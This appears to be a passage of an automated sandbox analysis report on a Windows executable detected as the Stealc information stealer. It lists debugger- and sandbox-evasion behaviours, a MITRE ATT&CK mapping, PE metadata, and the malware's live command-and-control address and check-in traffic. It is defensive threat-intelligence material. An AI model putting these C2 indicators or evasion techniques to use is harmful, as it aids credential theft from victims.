              Source: file.exe, 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25982
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25990
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25853
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25835
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D4A60 VirtualProtect 00000000,00000004,00000100,?0_2_004D4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6390 mov eax, dword ptr fs:[00000030h]0_2_004F6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_004F2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_004F4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004F46A0
              Source: file.exe, 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Program Manager
              Source: file.exeBinary or memory string: d6Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_004F2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_004F2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_004F2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_004F2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2189567754.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2189567754.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4576, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpu9100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpI9100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpy9100%Avira URL Cloudmalware
              http://185.215.113.206tD0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.214.172
              		truefalse
                		high
                ax-0001.ax-msedge.net
                		150.171.28.10
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.phpfalse
                    		high
                    http://185.215.113.206/false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.206/c4becf79229cb002.php9file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/pfile.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206tDfile.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://185.215.113.206file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/c4becf79229cb002.phpI9file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://185.215.113.206/c4becf79229cb002.phpy9file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://185.215.113.206/c4becf79229cb002.phpu9file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1561860
                              Start date and time:2024-11-24 14:55:11 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:12
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 127
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.198.119.84, 23.218.208.109
                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              bg.microsoft.map.fastly.netfile.exeGet hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              ListaItensVistoriaCorpodeBombeirosObrigatorio.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.210.172
                              registration.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              Digital.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              file_66efd0132ceed.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.210.172
                              e0#U05ea.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              ReceitaFederal-consulta-yFZMA-45896_v.3_35687.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              zapret.exeGet hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              canva.batGet hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              ax-0001.ax-msedge.netlw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                              • 150.171.27.10
                              17324340651fd0721b4a9b07278d0f63e6333ccd4883a9dc52eb27994b32b0d64dfb919b72906.dat-decoded.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                              • 150.171.28.10
                              ORDER 08757646566535857_95877465434-1.exeGet hashmaliciousFormBookBrowse
                              • 150.171.28.10
                              file.exeGet hashmaliciousStealcBrowse
                              • 150.171.27.10
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 150.171.27.10
                              file.exeGet hashmaliciousUnknownBrowse
                              • 150.171.27.10
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 150.171.27.10
                              file.exeGet hashmaliciousCredential FlusherBrowse
                              • 150.171.27.10
                              17323828261cfef277a3375a886445bf7f5a834ebb1cc85e533e9ac93595cd0e56ebd12426132.dat-decoded.exeGet hashmaliciousXWormBrowse
                              • 150.171.27.10
                              https://myqrcode.mobi/qr/3c3aa5e1/viewGet hashmaliciousUnknownBrowse
                              • 150.171.27.10

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.944606592651316
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'821'184 bytes
                              MD5:63467d79a3f868e98b2560394e80345f
                              SHA1:fc3bca2a34ae3511f229f34483471a3804c4c24e
                              SHA256:dbc2fd08e4e008755e38c372dfca2d459535a27df0c9ee97abeed7fb186a42a3
                              SHA512:ab3e25780704d550a83dd008775c9cdf2745b05c4a70797cd4b29277975c655ef1ea261a0a55d83066eb405fd36e47b3b4953fdf09288c4f4234779ea33a7193
                              SSDEEP:49152:Ja/zZhic2/wQ2aaWguehh3MJpyRvPSqoqQI17lz5Fj:JabZNaTa3MJpqoqTD
                              TLSH:C585331A55793FF3D162BCF0ABDC8225D2E01625601D365A6409A7EEF87AFCCD4032B9
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xa9c000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F052C803DEAh
                              push gs
                              sbb eax, dword ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F052C805DE5h
                              add byte ptr [ecx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+00h], ah
                              add byte ptr [eax], al
                              and al, 91h
                              int1
                              sldt word ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [edx], ecx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 0Ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2490000x1620065ede471ce3a591a6879a3a3f6d5e3d8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24a0000x2b00x200af6b08b359fbdefb44f86e86bc7403bfFalse0.798828125data6.041567286194159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x24c0000x2ac0000x2002f3f430851da4447a91ecdfcbfad8e2eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              woldotvo0x4f80000x1a30000x1a2c0045fd2c6e81059352fd590303887416cdFalse0.9947469682835821data7.953105657448845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              cpkeohyv0x69b0000x10000x400c15d5601c72afb6084b9dce4fbdfaca9False0.7734375data6.041920132610716IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x69c0000x30000x22001b4657d8a10165ff6a0331506bae1912False0.068359375DOS executable (COM)0.7719551230123033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x69a8c80x256ASCII text, with CRLF line terminators0.5100334448160535

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-24T14:56:18.703528+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649723185.215.113.20680TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 24, 2024 14:56:16.748410940 CET4972380192.168.2.6185.215.113.206
                              Nov 24, 2024 14:56:16.868139029 CET8049723185.215.113.206192.168.2.6
                              Nov 24, 2024 14:56:16.868262053 CET4972380192.168.2.6185.215.113.206
                              Nov 24, 2024 14:56:16.869250059 CET4972380192.168.2.6185.215.113.206
                              Nov 24, 2024 14:56:16.991336107 CET8049723185.215.113.206192.168.2.6
                              Nov 24, 2024 14:56:18.244362116 CET8049723185.215.113.206192.168.2.6
                              Nov 24, 2024 14:56:18.244430065 CET4972380192.168.2.6185.215.113.206
                              Nov 24, 2024 14:56:18.250592947 CET4972380192.168.2.6185.215.113.206
                              Nov 24, 2024 14:56:18.370989084 CET8049723185.215.113.206192.168.2.6
                              Nov 24, 2024 14:56:18.703416109 CET8049723185.215.113.206192.168.2.6
                              Nov 24, 2024 14:56:18.703527927 CET4972380192.168.2.6185.215.113.206
                              Nov 24, 2024 14:56:21.502793074 CET4972380192.168.2.6185.215.113.206

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 24, 2024 14:56:45.697779894 CET1.1.1.1192.168.2.60x2b20No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Nov 24, 2024 14:56:45.697779894 CET1.1.1.1192.168.2.60x2b20No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                              Nov 24, 2024 14:56:45.697779894 CET1.1.1.1192.168.2.60x2b20No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                              Nov 24, 2024 14:57:01.577508926 CET1.1.1.1192.168.2.60x196fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                              Nov 24, 2024 14:57:01.577508926 CET1.1.1.1192.168.2.60x196fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • 185.215.113.206

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649723185.215.113.206804576C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Nov 24, 2024 14:56:16.869250059 CET90OUTGET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 24, 2024 14:56:18.244362116 CET203INHTTP/1.1 200 OK
                              Date: Sun, 24 Nov 2024 13:56:18 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
